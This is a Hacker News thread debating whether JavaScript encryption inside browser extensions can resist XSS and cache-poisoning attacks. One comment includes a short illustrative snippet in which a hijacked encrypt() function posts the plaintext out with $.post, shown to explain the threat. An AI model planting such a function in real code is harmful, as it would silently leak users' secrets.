Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

Java, Python, etc don't have a DOM to consider.

When you're just an XSS away from an attacker doing:

  function encrypt(plaintext) {
    $.post(plaintext, ...);
    return plaintext;
  }
then you lose. The post talks about this, and XSS isn't the only way either.


If all of the Javascript code and application functionality is bundled into the add-on, it's trivial to avoid XSS. There's no "site" to script into via the URL, and rendering of dynamic elements can be done via a sandboxed iFrame, preventing any scripts from running within dynamic data. This is fairly basic security that any add-on developer should be aware of: http://developer.chrome.com/apps/sandboxingEval.html

"XSS isn't the only way either." That's about as illuminating as saying "something bad could happen."

No one is saying JavaScript or browser security is perfect, but if you actually know what you're doing, it can be done properly.

The original "JavaScript security is doomed" Matasano article is extremely out of date at this point, and yet people keep referring to it like it's gospel.


I don't like the article either, but you're wrong about it being "extremely out of date", and you'd have a very hard time defending your argument with evidence. Do try.


Right, but an attacker needs access to the DOM first. If everything is packaged, this is just as difficult as being able to inject random python code.

Sure, you can set up your app to stupidly do evals everywhere, but you can program a bad app in any language.

> XSS isn't the only way either

That's very, very vague. I asked what the attack vectors are. Saying "others" doesn't really work for me.


Right, like getting access to the DOM was ever a hard thing to do. I was specifically referring to web apps in that point, but because you insist, I'll just reference [1].

Another vector to get rogue JS into a user's browser is cache-poisoning, something the article also brings up.

[1] http://media.blackhat.com/bh-us-12/Briefings/Osborn/BH_US_12...


Cache poisoning won't work if an extension loads all of its code from its own bundle. So I fail to see how this applies to an app that is fully self-contained within an extension (extensions themselves are signed, so it's not like you could MitM the extension bundle itself...)




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: